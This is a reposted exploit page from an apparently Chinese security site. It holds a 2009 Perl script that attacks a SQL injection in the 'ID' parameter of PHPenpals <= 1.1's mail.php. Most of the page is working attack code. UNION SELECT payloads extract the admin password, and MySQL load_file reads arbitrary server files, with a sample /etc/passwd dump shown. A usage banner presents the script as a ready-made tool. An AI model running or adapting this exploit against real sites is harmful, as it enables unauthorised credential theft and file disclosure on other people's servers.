首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHPenpals <= 1.1 (mail.php ID) Remote SQL Injection Exploit
来源:br0ly.Code@gmail.com 作者:Br0ly 发布时间:2009-05-18  

#!usr/bin/perl
#|------------------------------------------------------------------------------------------------------------------
#| -Info:
#
#| -Name: Phpenpals
#| -Version: <= 1.1
#| -Site: http://sourceforge.net/projects/phpenpals/
#| -Download Script: http://sourceforge.net/project/showfiles.php?group_id=40166&package_id=32303&release_id=250717
#| -Bug: Sql Injection
#| -Found: by Br0ly
#| -BRAZIL >D
#| -Contact: br0ly.Code@gmail.com
#|
#| -Gretz: Osirys , xs86 , 6_Bl4ck9_f0x6 , str0ke
#|
#| -p0c:
#| -SQL INJECTION:
#|
#| -http://localhost/Scripts/phpenpals/mail.php?ID=-1+union+select+1,@@version--
#| -Vuls: @array = ('profile.php?personalID=' , 'mail.php?ID=')
#|  
#| - You just need pass of the admin for login in:
#| - http://localhost/Scripts/phpenpals/admin.php
#|
#| -Exploit: Demo:
#|------------------------------------------------------------------------------------------------------------------
#|
#| perl phpenpals.txt http://localhost/Scripts/phpenpals/ 1
#|
#|  --------------------------------------
#|   -Phpenpals                    
#|   -Sql Injection                     
#|   -by Br0ly                          
#|  --------------------------------------
#|
#|[+] Getting the pass of the admin.
#|[+] Password = admin
#|
#|perl phpenpals.txt http://localhost/Scripts/phpenpals/ 2
#|
#|  --------------------------------------
#|   -Phpenpals                    
#|   -Sql Injection                     
#|   -by Br0ly                          
#|  --------------------------------------
#|
#|[*] Cat:/etc/passwd
#|    
#|
#|root:x:0:0:root:/root:/bin/bash
#|daemon:x:1:1:daemon:/usr/sbin:/bin/sh
#|bin:x:2:2:bin:/bin:/bin/sh
#|sys:x:3:3:sys:/dev:/bin/sh
#|sync:x:4:65534:sync:/bin:/bin/sync
#|games:x:5:60:games:/usr/games:/bin/sh
#|man:x:6:12:man:/var/cache/man:/bin/sh
#|lp:x:7:7:lp:/var/spool/lpd:/bin/sh
#|
#| ;D
#| And sorry for my bad english ;/
#|
 
  use IO::Socket::INET;
  use LWP::UserAgent;

  my $host      = $ARGV[0];
  my $opcao     = $ARGV[1];
  my $sql_path  = "/mail.php?ID=";
 
  if (@ARGV < 2) {
      &banner();
      &help("-1");
  }
 
  elsif(cheek($host,$opcao) == 1) {
      &banner();
      &xploit($host,$opcao,$sql_path);
  }
    
  else {
      &banner();
      help("-2");
  }
 
  sub xploit() {
      my $host     = $_[0];
      my $opcao    = $_[1];
      my $sql_path = $_[2];
      if($opcao == 1) { &adm_pass($host,$sql_path);  }
      if($opcao == 2) { &file_load($host,$sql_path); }
  }

  sub adm_pass() {
    
      print "[+] Getting the pass of the admin.\n";
      my $host     = $_[0];
      my $spl_path = $_[1];
      my $sql_atk = $host.$spl_path."-1+union+select+1,concat(0x6272306c79,0x3a,password,0x3a,0x6272306c79)+from+admin--";
      my $re = get_url($sql_atk);
      if($re =~ /br0ly:(.+):br0ly/) {
    print "[+] Password = $1\n";
    exit(0);
      }
      else {
    print "[-] Exploit, Fail\n";
    exit(0);
    
      }
  }
 
  sub file_load() {
 
     my $host     = $_[0];
     my $spl_path = $_[1];
   
     print "[*] Cat:";
     my $file = <STDIN>;
     chomp($file);
     $file !~ /exit/ || die "[-] Quitting ..\n";
   
     if ($file !~ /\/(.*)/) {
    print "\n[-] Bad filename !\n";
    &file_load($host,$spl_path);
     }
   
     my $fencode = hex_str($file);
     my $byte = "0x";
     my $fl_atk = $host.$spl_path."-1+union+select+1,load_file(".$byte.$fencode.")--";
     my $re = get_url($fl_atk);
     my $content = tag($re);
        
     if ($content =~ /<table>\*\*<tr><td>(.+)<\/td><td><\/td><\/tr>/) {
    my $out = $1;
  
        $out =~ s/\$/ /g;
    $out =~ s/\*\*\*\*/ /g;
    $out =~ s/\*/\n/g;
    $out =~ s/Send/ /g;
    $out =~ s/email/ /g;
    $out =~ s/to/ /g;
        $out =~ s/$out/$out\n/ if ($out !~ /\n$/);
        print "$out";
    &file_load($host,$spl_path);

    if($out =~ ' ') {
      $c++;
      print "[-] Can't find ".$file." \n";
      if ( $c < 3 ) {
        print "[-] Exploit Fail\n\n";
        &file_load($host,$spl_path);
      }
  
      else { exit(0); }
  
    }
      }
 
  }  

  sub get_url() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
  }

  sub tag() {
    my $string = $_[0];
    $string =~ s/ /\$/g;
    $string =~ s/\s/\*/g;
    return($string);
  }

  sub hex_str () {
  
    my $str_1 = $_[0];
    my $str_hex = unpack('H*', "$str_1");
    return $str_hex;
  
  }

  sub cheek() {
    my $host  = $_[0];
    my $opcao = $_[1];
    if (($host =~ /http:\/\/(.*)/) && (($opcao == 1 || $opcao == 2))) {
        return 1;
    }
    else {
        return 0;
    }
  }

  sub help() {

    my $error = $_[0];
    if ($error == -1) {
        print "\n[-] Error, missed some arguments !\n\n";
    }
  
    elsif ($error == -2) {

        print "\n[-] Error, Bad arguments !\n\n";
    }
 
    print "[*] Usage : perl $0 http://localhost/phpenpals/ opcao \n";
    print "    Ex:     perl $0 http://localhost/phpenpals/ 1\n";
    print "[*] opcao 1 : adm pass\n";
    print "[*] opcao 2 : file_disc\n";
    exit(0);
  }

  sub banner {
    print "\n".
          "  --------------------------------------\n".
          "   -Phpenpals                       \n".
          "   -Sql Injection                       \n".
          "   -by Br0ly                            \n".
          "  --------------------------------------\n\n";
  }


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft IIS 6.0 WebDAV Remot
·Basic differences between x86
·freebsd/x86-64 execve /bin/sh
·linux/x86-64 bindshell(port 44
·Audioactive Player 1.93b (.m3u
·Harland Scripts 11 Products Re
·httpdx <= 0.5b FTP Server (USE
·Audioactive Player 1.93b (.m3u
·ClanWeb 1.4.2 Remote Change Pa
·Jieqi CMS versions 1.5 and bel
·Dana Portal Remote Change Admi
·linux/x86-64 setuid(0) + execv
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved